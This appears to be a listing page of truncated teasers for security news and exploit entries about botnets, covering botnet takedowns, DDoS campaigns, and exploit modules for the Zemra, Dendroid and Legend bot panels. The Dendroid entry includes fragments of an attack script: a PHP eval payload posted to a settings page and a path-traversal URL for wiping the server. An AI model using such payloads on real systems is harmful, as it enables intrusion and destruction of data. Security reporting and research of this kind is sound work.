Zemra Botnet CnC Web Panel Remote Code Execution

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'Zemra Botnet CnC Web Panel Remote Code Execution', 'Description' = %q This module exploits the CnC web panel of Zemra Botnet which...

Zemra Botnet CnC Web Panel Remote Code Execution

This module exploits the CnC web panel of Zemra Botnet which contains a backdoor inside its leaked source code. Zemra is a crimeware bot that can be used to conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra. This module requires Metasploit: https://metasploit.com/download Current...

New Botnet Hunts for Linux — Launching 20 DDoS Attacks/Day at 150Gbps

A network of compromised Linux servers has grown so powerful that it can blow large websites off the Internet by launching crippling Distributed Denial-of-service DDoS attacks of over 150 gigabits per second Gbps. The distributed denial-of-service network, dubbed XOR DDoS Botnet, targets over 20...

Dendroid botnet Remote Code Execution Vulnerability

Bonus to remotely wipe the whole server: /deletepics.php?uid=../../Panel/ import requests Add URL Set a PHP payload Go to http://website/config.php URL = 'http://localhost/Panel/applysettings.php' PAYLOAD = "isset$GET'tapz' ? eval$GET'tapz' : '" data = 'dbhost' : 'localhost', 'dbname' : 'dendroid...

Google Report Outlines Dependencies in the For-Profit Cybercrime Food Chain

Security specialists need to change the game and shift gears, researchers argue – instead of focusing on protecting their users and systems, they should narrow their sights on trying to shake up cybercrime’s seedy underbelly. At least that’s how Kurt Thomas and Elie Bursztein, researchers at...

Spam Campaign Continuing to Serve Up Malicious .js Files

A malicious spam campaign that’s been doling out zipped Javascript .js files remains an issue, the SANS Internet Storm Center warns. The campaign was spotted earlier this year, but Brad Duncan, a handler for the site and researcher with Rackspace’s information security operations center, claims...

Google Image CSRF Vulnerability & Using it as a Botnet

Exploit for php platform in category web applications / Exploit Title: Google Image CSRF Vulnerability & Using it as a Botnet Exploit Author: C4T Vendor Homepage : http://images.google.com Google Dork: none Tested on: Linux & Windows ====================================================== Google...

Pineapple 2.3.0 Autopwn Script

I have wrote PoC half a year ago, because i needed to try it on my Chinese router, and it still works on freshly purchased pineapple devices. hello from Defcon ; And guys, it’s not a talk for the defcon, especially if you have done a botnet based on that shit… ; See ya tomorrow at WiFi village...

Updated DGA Changer Malware Generates Fake Domain Stream

LAS VEGAS — The group behind the DGA Changer downloader has been pretty adept in modifying the malware to elude sandbox detection in particular. Researchers at Seculert today published a report on the latest twist to DGA Changer, which now is able to generate a fake stream of domains if it detect...

Malware And Hacking Forum Seized, Dozens Arrested

The FBI and other law enforcement agencies have arrested more than 70 people suspected of carrying out cyber criminal activities associated with one of the most active underground web forums known as Darkode. Darkode, also used by notorious Lizard Squad, was an online bazaar for cyber criminals...

Europol Arrests Gang Behind Zeus And SpyEye Banking Malware

The Law enforcement agencies from six different European countries have taken down a major Ukrainian-based cyber criminals gang suspected of developing, distributing and deploying Zeus and SpyEye banking malware. According to the report on the official website of Europol, authorities have arreste...

Adware-Laden Skype Botnet Disrupted

Skype, Microsoft’s now ubiquitous video/messenger program, has long been a go-to destination for attackers looking to peddle their malware. The latest campaign to leverage the software – a botnet circulating adware, composed entirely of Skype users – was recently disrupted by researchers. Ronnie...

Researchers: Patch Incomplete for Hola VPN Vulnerabilities

Hola, a popular, free, peer-to-peer service that enables anonymous surfing and access to blocked online resources, said today it has patched vulnerabilities discovered last week that expose its millions of users to possible code execution, remote monitoring and other threats to privacy and...

Hola — A widely popular Free VPN service used as a Giant Botnet

The bandwidth of millions of users of a popular free VPN service is being sold without their knowledge in an attempt to cover the cost of its free service, which could result in a vast botnet-for-sale network. "Hola," a free virtual private network, is designed to help people abroad watch...

DDoS Botnet Leverages Thousands of Insecure SOHO Routers

Small office and home office SOHO routers are an increasingly common target for cybercriminals, not because of any vulnerability, but because most routers are loosely managed and often deployed with default administrator credentials. A new report suggests that hackers are using large botnet of te...

Default Credentials Lead to Massive DDoS-For-Hire Botnet

Tens of thousands of home and office-based routers have been hijacked over the last several months to form a botnet used to stage a DDoS campaign. The attacks first surfaced at the tail end of last year, around Dec. 29, and after a short reprieve, spiked twofold over the last month. The web...

Elasticsearch Elastichoney Honeypot Shows 8,000 RCE Attacks

Hackers have taken an interest in Elasticsearch, a popular enterprise search engine. A researcher based in Texas, whose own Elasticsearch server was hacked, today published results collated from a honeypot he built to get a sense of how widespread attacks are against the vulnerability that did in...

Legend Perl IRC Bot - Remote Code Execution

Legend Perl IRC Bot - Remote Code Execution legendrce.py Legend Perl IRC Bot Remote Code Execution PoC author: Jay Turla @shipcod3 description: This is a RCE PoC for Legend Bot which has been used in the Shellshock spam October 2014. reference:...

Beebone Botnet Taken Down By International Cybercrime Taskforce

U.S. and European law enforcement agencies have shut down a highly sophisticated piece of the botnet that had infected more than 12,000 computers worldwide, allowing hackers to steal victims’ banking information and other sensitive data. The law enforcement agencies from the United States, United...

Beebone Botnet Takedown Carried Out

A relatively small yet troublesome botnet has been shut down in a joint operation between U.S. and European law enforcement and a number of private security companies, including Kaspersky Lab. The takedown of Beebone was carried out on Wednesday by the FBI, the Department of Homeland Security,...